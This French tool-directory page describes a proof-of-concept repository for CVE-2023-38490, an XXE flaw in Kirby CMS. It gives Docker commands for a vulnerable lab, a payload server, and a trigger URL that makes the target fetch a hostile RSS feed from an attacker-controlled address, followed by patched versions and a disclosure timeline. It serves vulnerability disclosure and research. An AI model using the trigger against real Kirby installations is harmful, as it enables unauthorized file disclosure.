Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
exploit-CVE-2023-38490 — Kirby < 3.9.6 XML External Entity exploit | Kitploit
Outils/GitHubGitHub/acceis/exploit-cve-2023-38490
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFApprentissage et ÉducationLabs et Pratique
GitHubacceis/exploit-cve-2023-38490

exploit-CVE-2023-38490

Kirby < 3.9.6 XML External Entity exploit

Voir le dépôt
12il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Exploitation d'Entité Externe XML (XXE) de Kirby - CVE-2023-38490

Kirby < 3.9.6 Entité Externe XML

Exploit pour CVE-2023-38490 / GHSA-q386-w6fg-gmgp.

Démonstration de l'exploitation

Construire et exécuter l'application de démonstration vulnérable :

root@kitploit:~
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest

Servir la charge utile de démonstration :

Remarque : choisissez une adresse de liaison que le conteneur docker peut atteindre.

root@kitploit:~
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225

Déclencher l'exploit :

root@kitploit:~
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss

Comment et pourquoi cela fonctionne-t-il ?

La fonction vulnérable est présente dans Kirby Core mais n'est pas utilisée par défaut dans Kirby Core, Kirby StarterKit ou Kirby PlainKit. Cela signifie que la vulnérabilité ne vous affectera pas sur la configuration par défaut mais pourrait être introduite avec un développement personnalisé ou en installant un plugin utilisant la boîte à outils impactée.

Pour plus de détails, lisez l'article dédié (EN 🇬🇧 ou FR 🇫🇷).

Références

  • Logiciel cible : Kirby
    • Page d'accueil / Éditeur : https://getkirby.com/
    • Code source :
      • Core : https://github.com/getkirby/kirby
      • StarterKit (exemple de site) : https://github.com/getkirby/starterkit
      • PlainKit (configuration minimale) : https://github.com/getkirby/plainkit
    • Versions vulnérables :
      • <= 3.5.8.2
      • 3.6.0-3.6.6.2
      • 3.7.0-3.7.5.1
      • 3.8.0-3.8.4
      • 3.9.0-3.9.5
    • Versions corrigées :
      • 3.5.8.3+
      • 3.6.6.3+
      • 3.7.5.2+
      • 3.8.4.1+
      • 3.9.6+
    • Correctifs :
      • 3.5-3.7 : 4b2c454
      • 3.8-3.9 : 277b056
    • Avis de sécurité :
      • Github
      • OpenCVE
      • AttackerKB

Chronologie

  • Semaine 24 - Lun, 12 juin 2023 : Vulnérabilité découverte par Alexandre ZANNI (@noraj), Ingénieur en tests d'intrusion chez ACCEIS.
  • Semaine 24 - Mar, 13 juin 2023 : Vulnérabilité signalée à l'éditeur (Kirby) par Alexandre ZANNI
  • Semaine 24 - Mer, 14 juin 2023 : Preuve de concept partagée avec l'éditeur (Kirby) par Alexandre ZANNI
  • Semaine 24 - Mer, 14 juin 2023 : RFC 9116 security.txt ajoutée à getkirby.com
  • Semaine 24 - Jeu, 15 juin 2023 : Vulnérabilité confirmée par l'éditeur (Kirby)
  • Semaine 24 - Jeu, 15 juin 2023 : Corrections et correctifs planifiés
  • Semaine 26 - Jeu, 29 juin 2023 : Vulnérabilité découverte indépendamment par Patrick FALB (@dapatrese) chez FORMER 03.
  • Semaine 28 - Dim, 16 juillet 2023 : Création d'un avis de sécurité privé GitHub
  • Semaine 29 - Dim, 23 juillet 2023 : ID CVE demandé
  • Semaine 29 - Dim, 23 juillet 2023 : Vulnérabilité corrigée par l'éditeur (Kirby)
  • Semaine 30 - Lun, 24 juillet 2023 : Alexandre ZANNI invité à l'avis privé par l'éditeur (Kirby)
  • Semaine 30 - Lun, 24 juillet 2023 : Préparation d'un conteneur docker de démonstration vulnérable par Alexandre ZANNI
  • Semaine 30 - Lun, 24 juillet 2023 : ID CVE CVE-2023-38490 enregistré (réservé)
  • Semaine 30 - Jeu, 27 juillet 2023 : Publication publique de l'avis GitHub et des correctifs

Avertissement

ACCEIS ne promeut ni n'encourage aucune activité illégale, tout le contenu fourni par ce dépôt est destiné uniquement à des fins de recherche, d'éducation et de détection de menaces.

Télécharger l’outil